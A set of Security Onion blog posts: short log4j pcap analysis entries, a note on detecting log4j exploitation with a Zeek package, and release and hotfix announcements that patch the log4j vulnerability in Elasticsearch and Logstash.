Quick Malware Analysis: log4j pcap from 2022-01-03

Thanks to Brad Duncan for sharing this pcap!
https://www.malware-traffic-analysis.net/2022/01/03/index.html

We did a quick analysis of this pcap on the latest version of Security Onion with Zeek log4j scripts and so-import-pcap:
https://docs.securityonion.net/en/2.3/zeek.html#custom-script-example-log4j
https://docs.securityonion.net/en/2.3/so-import-pcap.html

About Security Onion

Security Onion is a versatile and scalable platform that can run on small virtual machines and can also scale up to the opposite end of the hardware spectrum to take advantage of extremely powerful server-class machines.  Security Onion can also scale horizontally, growing from a standalone single-machine deployment to a full distributed deployment with tens or hundreds of machines as dictated by your enterprise visibility needs.

To learn more about Security Onion, please see:
https://securityonion.net
https://securityonion.net/docs

More Samples

Find all of our Quick Malware posts at:
https://blog.securityonion.net/search/label/quick%20malware%20analysis

Screenshots

Quick Malware Analysis: log4j pcap from 2021-12-20

Thanks to Brad Duncan for sharing this pcap!
https://www.malware-traffic-analysis.net/2021/12/20/index.html

We did a quick analysis of this pcap on the latest version of Security Onion with Zeek log4j scripts and so-import-pcap:
https://docs.securityonion.net/en/2.3/zeek.html#custom-script-example-log4j
https://docs.securityonion.net/en/2.3/so-import-pcap.html

About Security Onion

Security Onion is a versatile and scalable platform that can run on small virtual machines and can also scale up to the opposite end of the hardware spectrum to take advantage of extremely powerful server-class machines.  Security Onion can also scale horizontally, growing from a standalone single-machine deployment to a full distributed deployment with tens or hundreds of machines as dictated by your enterprise visibility needs.

To learn more about Security Onion, please see:
https://securityonion.net
https://securityonion.net/docs

More Samples

Find all of our Quick Malware posts at:
https://blog.securityonion.net/search/label/quick%20malware%20analysis

Screenshots

Detecting Log4j Exploitation Attempts via Zeek in Security Onion

Corelight has developed a Zeek package to detect log4j exploitation attempts:

https://github.com/corelight/cve-2021-44228

This package contains Zeek scripts which can easily be loaded into your Security Onion deployment. We've documented this process here:

https://docs.securityonion.net/en/2.3/zeek.html#custom-script-example-log4j

After following this process, we ran so-import-pcap on the log4j pcap from https://www.malware-traffic-analysis.net/2021/12/14/index.html:

Security Onion 2.3.91 Now Available including Elastic 7.16.2 and Log4j 2.17.0!

We recently released Security Onion 2.3.90 and a few hotfixes:
https://blog.securityonion.net/2021/11/security-onion-2390-now-available.html
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-wazuh
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-airgapfix
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-20211206
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-20211210
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-20211213

Today, we are releasing Security Onion 2.3.91:
https://docs.securityonion.net/en/2.3/release-notes.html#changes

If you haven't updated recently, then you should review all links above so that you are aware of all recent changes.

Summary

Several vulnerabilities were recently announced in log4j:
https://logging.apache.org/log4j/2.x/security.html

We released an initial hotfix on 2021/12/10:
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-20211210

Elastic later released additional details:
https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476

We then released a second hotfix on 2021/12/13:
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-20211213

Today's 2.3.91 release updates to Elastic 7.16.2 which includes Log4j 2.17.0:
https://www.elastic.co/blog/new-elasticsearch-and-logstash-releases-upgrade-apache-log4j2

Known Upgrade Issues

Since we are moving from Elastic 7.15 to 7.16, please be aware that custom settings in Kibana may be overwritten during upgrade.

If soup displays the following message:

warning: setlocale: LC_CTYPE: cannot change locale (en_US.UTF-8): No such file or directory

then you may need to run the following command:

sudo locale-gen en_US.UTF-8

For more information, please see:
https://github.com/Security-Onion-Solutions/securityonion/issues/6599 

After soup completes, if you run a vulnerability scanner against the filesystem, it may find older versions of log4j in the older unused Docker images. Soup updates always keep the previous version of Docker images, so these will automatically be removed at the next Docker image update.

Internet-Connected Deployments

If your Security Onion deployment has Internet access, simply run "sudo soup" as described here:
https://docs.securityonion.net/en/2.3/soup.html

Airgap Deployments

If you have an airgap deployment, download the new ISO image from the usual location:
https://securityonion.net/download

Then follow the steps here:
https://docs.securityonion.net/en/2.3/airgap.html#security-onion-version-updates

Security Onion 16.04

If you are still running Security Onion 16.04, please note that it is past End Of Life. Please take this opportunity to upgrade to Security Onion 2:
https://docs.securityonion.net/en/2.3/appendix.html

Questions or Problems

If you have questions or problems, please see our community support forum guidelines:
https://docs.securityonion.net/en/2.3/community-support.html

You can then find the community support forum at:
https://securityonion.net/discuss

Security Onion 2.3.90 20211213 Hotfix Now Available to Fully Mitigate All Known log4j Attack Vectors!

We recently released Security Onion 2.3.90 and a few hotfixes:
https://blog.securityonion.net/2021/11/security-onion-2390-now-available.html
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-wazuh
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-airgapfix
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-20211206
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-20211210

Today, we are releasing an additional hotfix:
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-20211213

If you haven't updated recently, then you should review all links above so that you are aware of all recent changes.

Summary

A vulnerability was recently announced in log4j:
https://github.com/advisories/GHSA-jfh8-c2jp-5v3q

We released an initial hotfix on Friday:
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-20211210

Elastic later released additional details:
https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476

Today's hotfix addresses all known attack vectors for the log4j vulnerability by fully removing the JndiLookup class.

UPDATE 2021/12/14 An additional CVE was announced:
https://nvd.nist.gov/vuln/detail/CVE-2021-45046

This new CVE recommends removing the JndiLookup class and that was done in this 20211213 hotfix.

UPDATE 2021/12/16 If you scan with a vulnerability scanner that just looks at version numbers, then it may detect vulnerabilities as we kept the existing version numbers but removed the vulnerable JndiLookup class. Also, some scanners may flag elasticsearch-sql-cli-7.15.2.jar but there is no attack vector here according to Elastic:

This tool is standalone (NOT part of the server), for running ad-hoc SQL interactions. The tool does NOT accept external user input. The mere presence of the JndiLookup.class is not problematic here, but it looks interesting and could lead to confusion for scanners

UPDATE 2021/12/20 Elastic released 7.16.2 yesterday with updated Log4j 2.17.0, primarily to avoid false positives in vulnerability scanners. We are currently looking into this version. Updating to new Elastic containers will require a full release (not just a hotfix), so it will take some time.

Internet-Connected Deployments

If your Security Onion deployment has Internet access, simply run "sudo soup" as described here:
https://docs.securityonion.net/en/2.3/soup.html

Airgap Deployments

If you have an airgap deployment, download the new ISO image from the usual location:
https://securityonion.net/download

Then follow the steps here:
https://docs.securityonion.net/en/2.3/airgap.html#security-onion-version-updates

Security Onion 16.04

If you are still running Security Onion 16.04, please note that it is past End Of Life. Please take this opportunity to upgrade to Security Onion 2:
https://docs.securityonion.net/en/2.3/appendix.html

Questions or Problems

If you have questions or problems, please see our community support forum guidelines:
https://docs.securityonion.net/en/2.3/community-support.html

You can then find the community support forum at:
https://securityonion.net/discuss

Security Onion 2.3.90 20211210 Hotfix Now Available to Mitigate log4j Vulnerability!

We recently released Security Onion 2.3.90 and a few hotfixes:
https://blog.securityonion.net/2021/11/security-onion-2390-now-available.html
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-wazuh
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-airgapfix
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-20211206

Today, we are releasing an additional hotfix:
https://docs.securityonion.net/en/2.3/release-notes.html#hotfix-20211210

If you haven't updated recently, then you should review all links above so that you are aware of all recent changes.

A vulnerability was recently announced in log4j:
https://github.com/advisories/GHSA-jfh8-c2jp-5v3q

The following components have vulnerable versions of log4j:

• Elasticsearch
• Logstash
• TheHive/Cortex have a separate Elasticsearch instance

For Elasticsearch, Logstash, and the Elasticsearch instance for TheHive/Cortex, we've added the log4j2.formatMsgNoLookups=true option to disable the vulnerable code. It should be noted that TheHive/Cortex includes log4j 2.9.1 but NOT log4j-core-2.9.1.jar, which is the JAR that contains the JNDI lookup code. Instead, TheHive and Cortex utilize the simple logging facade via log4j-to-slf4j-2.9.1.jar and that library does NOT contain the vulnerable JNDI lookup code.

UPDATE 2021/12/13 We've released an additional hotfix that more fully addresses all known log4j attack vectors:
https://blog.securityonion.net/2021/12/security-onion-2390-20211213-hotfix-now.html

Internet-Connected Deployments

If your Security Onion deployment has Internet access, simply run "sudo soup" as described here:
https://docs.securityonion.net/en/2.3/soup.html

Airgap Deployments

If you have an airgap deployment, download the new ISO image from the usual location:

https://securityonion.net/download

Then follow the steps here:

https://docs.securityonion.net/en/2.3/airgap.html#security-onion-version-updates

Security Onion 16.04

If you are still running Security Onion 16.04, please note that it is past End Of Life. Please take this opportunity to upgrade to Security Onion 2:
https://docs.securityonion.net/en/2.3/appendix.html

Questions or Problems

If you have questions or problems, please see our community support forum guidelines:

https://docs.securityonion.net/en/2.3/community-support.html

You can then find the community support forum at:

https://securityonion.net/discuss